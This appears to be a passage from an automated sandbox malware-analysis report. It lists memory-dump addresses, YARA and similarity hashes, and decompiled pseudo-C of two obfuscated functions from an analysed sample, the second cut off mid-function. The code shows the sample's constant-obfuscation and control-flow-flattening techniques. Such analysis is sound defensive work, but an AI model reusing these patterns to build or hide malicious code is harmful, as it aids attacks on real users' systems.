                                          0x006cd321
                                          0x006cd327
                                          0x006cd327
                                          0x006cd323
                                          0x006cd323
                                          0x006cd323
                                          0x006cd329
                                          0x006cd32b
                                          0x006cd332
                                          0x006cd332
                                          0x006cd32d
                                          0x006cd32d
                                          0x006cd32d
                                          0x006cd35b
                                          0x006cd360
                                          0x006cd365
                                          0x006cd36d
                                          0x00000000
                                          0x006cd36d
                                          0x006cd22d
                                          0x006cd315
                                          0x006cd20d
                                          0x006cd20d
                                          0x006cd20f
                                          0x006cd20f
                                          0x00000000
                                          0x006cd20f
                                          0x00000000
                                          0x006cd20d
                                          0x006cd23a
                                          0x006cd2f8
                                          0x006cd2fd
                                          0x006cd300
                                          0x006cd304
                                          0x006cd310
                                          0x00000000
                                          0x006cd310
                                          0x006cd242
                                          0x006cd291
                                          0x006cd296
                                          0x006cd29b
                                          0x00000000
                                          0x006cd29c
                                          0x006cd24a
                                          0x006cd639
                                          0x006cd639
                                          0x006cd63f
                                          0x006cd272
                                          0x006cd27c
                                          0x006cd27c
                                          0x006cd645
                                          0x00000000
                                          0x006cd645
                                          0x006cd269
                                          0x00000000
                                          0x006cd398
                                          0x006cd398
                                          0x006cd39e
                                          0x006cd51a
                                          0x006cd51c
                                          0x006cd53c
                                          0x006cd51e
                                          0x006cd51e
                                          0x006cd52b
                                          0x006cd530
                                          0x006cd533
                                          0x006cd533
                                          0x006cd5c9
                                          0x006cd5d2
                                          0x006cd5d9
                                          0x006cd5de
                                          0x006cd5e1
                                          0x006cd5e3
                                          0x006cd62b
                                          0x006cd630
                                          0x006cd630
                                          0x006cd634
                                          0x00000000
                                          0x006cd634
                                          0x006cd5e5
                                          0x006cd5f1
                                          0x006cd612
                                          0x006cd617
                                          0x006cd61a
                                          0x006cd621
                                          0x00000000
                                          0x006cd621
                                          0x006cd3a4
                                          0x006cd3aa
                                          0x006cd498
                                          0x006cd49a
                                          0x006cd4a6
                                          0x006cd4a9
                                          0x006cd4aa
                                          0x006cd4ac
                                          0x006cd4c7
                                          0x006cd4cc
                                          0x006cd4cf
                                          0x006cd4d1
                                          0x006cd4ed
                                          0x006cd4f2
                                          0x006cd4f5
                                          0x006cd4f5
                                          0x006cd509
                                          0x006cd50f
                                          0x006cd510
                                          0x00000000
                                          0x006cd510
                                          0x006cd3b0
                                          0x006cd3b6
                                          0x006cd423
                                          0x006cd442
                                          0x006cd447
                                          0x006cd449
                                          0x006cd45a
                                          0x006cd474
                                          0x006cd479
                                          0x00000000
                                          0x006cd479
                                          0x006cd3b8
                                          0x006cd3be
                                          0x006cd414
                                          0x006cd419
                                          0x00000000
                                          0x006cd419
                                          0x006cd3c0
                                          0x006cd3c6
                                          0x00000000
                                          0x00000000
                                          0x006cd3e6
                                          0x006cd3e8
                                          0x006cd3ed
                                          0x006cd3f1
                                          0x006cd3f5
                                          0x006cd3f5
                                          0x006cd20d

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                          • API String ID: 0-3595463394
                                          • Opcode ID: ac3a594fd6a71efce64148898b3e65a045c7ec5b78a6f2517dc8c4d7c4d7bb49
                                          • Instruction ID: 7a4dbe226d5d7a5ad6d97b62f3626c7eda2fab01c2913b9022ee61fa8e533ab2
                                          • Opcode Fuzzy Hash: ac3a594fd6a71efce64148898b3e65a045c7ec5b78a6f2517dc8c4d7c4d7bb49
                                          • Instruction Fuzzy Hash: 007200715083818BE3B8CF25C54AB9BBBE2FBC4304F10891DE6D9962A0D7B58949CF53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CD7EB, Relevance: 21.6, Strings: 17, Instructions: 347COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E006CD7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x6dca2c; // 0x248300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E006C5FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E006C54FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E006CC6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E006D42DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E006C5FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E006D889D(0x6dc930, _v1108, __eflags);
							_t367 =  *0x6dca2c; // 0x248300
							_t402 =  *0x6dca2c; // 0x248300
							E006C29E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E006D2025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E006C2959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}
































































                                          0x006cd7eb
                                          0x006cd7f1
                                          0x006cd7fb
                                          0x006cd800
                                          0x006cd805
                                          0x006cd80a
                                          0x006cd812
                                          0x006cd823
                                          0x006cd827
                                          0x006cd82b
                                          0x006cd830
                                          0x006cd838
                                          0x006cd843
                                          0x006cd84b
                                          0x006cd856
                                          0x006cd85e
                                          0x006cd866
                                          0x006cd86e
                                          0x006cd876
                                          0x006cd87e
                                          0x006cd886
                                          0x006cd88e
                                          0x006cd896
                                          0x006cd89e
                                          0x006cd8a6
                                          0x006cd8ae
                                          0x006cd8b6
                                          0x006cd8bb
                                          0x006cd8c3
                                          0x006cd8cb
                                          0x006cd8d9
                                          0x006cd8dc
                                          0x006cd8e4
                                          0x006cd8e8
                                          0x006cd8f0
                                          0x006cd8f8
                                          0x006cd900
                                          0x006cd905
                                          0x006cd90a
                                          0x006cd912
                                          0x006cd91d
                                          0x006cd928
                                          0x006cd933
                                          0x006cd93b
                                          0x006cd943
                                          0x006cd94b
                                          0x006cd950
                                          0x006cd958
                                          0x006cd963
                                          0x006cd96b
                                          0x006cd976
                                          0x006cd989
                                          0x006cd990
                                          0x006cd99b
                                          0x006cd9a6
                                          0x006cd9b1
                                          0x006cd9bc
                                          0x006cd9c4
                                          0x006cd9cc
                                          0x006cd9d4
                                          0x006cd9dc
                                          0x006cd9e4
                                          0x006cd9e9
                                          0x006cd9f1
                                          0x006cd9fc
                                          0x006cda07
                                          0x006cda12
                                          0x006cda1a
                                          0x006cda22
                                          0x006cda27
                                          0x006cda2f
                                          0x006cda3a
                                          0x006cda42
                                          0x006cda4f
                                          0x006cda57
                                          0x006cda5f
                                          0x006cda64
                                          0x006cda6c
                                          0x006cda74
                                          0x006cda7f
                                          0x006cda86
                                          0x006cda91
                                          0x006cdaa6
                                          0x006cdaa7
                                          0x006cdaae
                                          0x006cdab9
                                          0x006cdac1
                                          0x006cdacb
                                          0x006cdacf
                                          0x006cdad7
                                          0x006cdae4
                                          0x006cdaed
                                          0x006cdaf1
                                          0x006cdaf9
                                          0x006cdb04
                                          0x006cdb0f
                                          0x006cdb1a
                                          0x006cdb22
                                          0x006cdb2a
                                          0x006cdb32
                                          0x006cdb3a
                                          0x006cdb42
                                          0x006cdb4a
                                          0x006cdb52
                                          0x006cdb5a
                                          0x006cdb62
                                          0x006cdb6a
                                          0x006cdb72
                                          0x006cdb80
                                          0x006cdb84
                                          0x006cdb89
                                          0x006cdb8e
                                          0x006cdb96
                                          0x006cdb9e
                                          0x006cdba6
                                          0x006cdbae
                                          0x006cdbb3
                                          0x006cdbbb
                                          0x006cdbc3
                                          0x006cdbcb
                                          0x006cdbd0
                                          0x006cdbd8
                                          0x006cdbe0
                                          0x006cdbeb
                                          0x006cdbf6
                                          0x006cdc01
                                          0x006cdc09
                                          0x006cdc11
                                          0x006cdc19
                                          0x006cdc24
                                          0x006cdc2f
                                          0x006cdc3a
                                          0x006cdc45
                                          0x006cdc4d
                                          0x006cdc58
                                          0x006cdc65
                                          0x006cdc69
                                          0x006cdc6e
                                          0x006cdc76
                                          0x006cdc7e
                                          0x006cdc86
                                          0x006cdc8b
                                          0x006cdc93
                                          0x006cdc9b
                                          0x006cdcb2
                                          0x006cdcb5
                                          0x006cdcbc
                                          0x006cdcc3
                                          0x006cdcce
                                          0x006cdcde
                                          0x006cdce5
                                          0x006cdce9
                                          0x006cdcf1
                                          0x006cdcf9
                                          0x006cdd01
                                          0x006cdd0d
                                          0x006cdd10
                                          0x006cdd17
                                          0x006cdd1b
                                          0x006cdd20
                                          0x006cdd28
                                          0x006cdd30
                                          0x006cdd38
                                          0x006cdd40
                                          0x006cdd45
                                          0x006cdd4d
                                          0x006cdd55
                                          0x006cdd5d
                                          0x006cdd65
                                          0x006cdd6d
                                          0x006cdd75
                                          0x006cdd75
                                          0x006cdd77
                                          0x006cdd78
                                          0x006cdd78
                                          0x006cdd78
                                          0x006cdd78
                                          0x006cdd7e
                                          0x00000000
                                          0x00000000
                                          0x006cdd84
                                          0x006cde9f
                                          0x006cdea5
                                          0x006cdeb0
                                          0x006cdeb0
                                          0x006cdeb3
                                          0x00000000
                                          0x00000000
                                          0x006cdead
                                          0x006cdead
                                          0x006cdead
                                          0x006cdeb5
                                          0x006cdeb8
                                          0x00000000
                                          0x006cdeb8
                                          0x006cdd90
                                          0x006cdfca
                                          0x006cdfd0
                                          0x006cdfe1
                                          0x006cdfe1
                                          0x006cdd9c
                                          0x006cde77
                                          0x006cde79
                                          0x006cde7c
                                          0x006cde7e
                                          0x006cde95
                                          0x006cde80
                                          0x006cde80
                                          0x006cde85
                                          0x006cde85
                                          0x006cdd75
                                          0x006cdd75
                                          0x006cdd77
                                          0x00000000
                                          0x006cdd77
                                          0x006cdd75
                                          0x006cdda4
                                          0x006cddd7
                                          0x006cddd8
                                          0x006cddfc
                                          0x006cde01
                                          0x006cde04
                                          0x006cdd75
                                          0x006cdd75
                                          0x006cdd77
                                          0x00000000
                                          0x006cdd77
                                          0x006cdd75
                                          0x006cddac
                                          0x00000000
                                          0x00000000
                                          0x006cddc8
                                          0x006cddcd
                                          0x006cddd0
                                          0x006cdd75
                                          0x006cdd75
                                          0x006cdd77
                                          0x00000000
                                          0x006cdd77
                                          0x006cdd75
                                          0x006cdec2
                                          0x006cdec8
                                          0x006cdfa5
                                          0x006cdfad
                                          0x006cdfb2
                                          0x00000000
                                          0x006cdfb2
                                          0x006cdece
                                          0x006cded4
                                          0x006cdf14
                                          0x006cdf21
                                          0x006cdf42
                                          0x006cdf5c
                                          0x006cdf68
                                          0x006cdf84
                                          0x006cdf89
                                          0x006cdf8c
                                          0x006cdd75
                                          0x006cdd75
                                          0x006cdd77
                                          0x00000000
                                          0x006cdd77
                                          0x006cdd75
                                          0x006cded6
                                          0x006cdedc
                                          0x00000000
                                          0x00000000
                                          0x006cdefd
                                          0x006cdeff
                                          0x006cdf02
                                          0x006cdf04
                                          0x00000000
                                          0x00000000
                                          0x006cdf0a
                                          0x00000000
                                          0x006cdfb3
                                          0x006cdfb3
                                          0x006cdfb3
                                          0x00000000
                                          0x006cdfbf

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                          • API String ID: 0-131801274
                                          • Opcode ID: 5368bce5bdd023042b4004dbb5e89f79af7c06a0a34f2076ad939c64e76617e7
                                          • Instruction ID: 19913671c0de2d1f24afec1b74352f0fb8f6b637f11aa77221109dfcca91d8fc
                                          • Opcode Fuzzy Hash: 5368bce5bdd023042b4004dbb5e89f79af7c06a0a34f2076ad939c64e76617e7
                                          • Instruction Fuzzy Hash: 3C02F371509380DFE3A9CF61C54AA5BFBE2FBC5708F10891DE19A862A0D7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CF98C, Relevance: 20.4, Strings: 16, Instructions: 390COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E006CF98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E006C602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E006CF39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
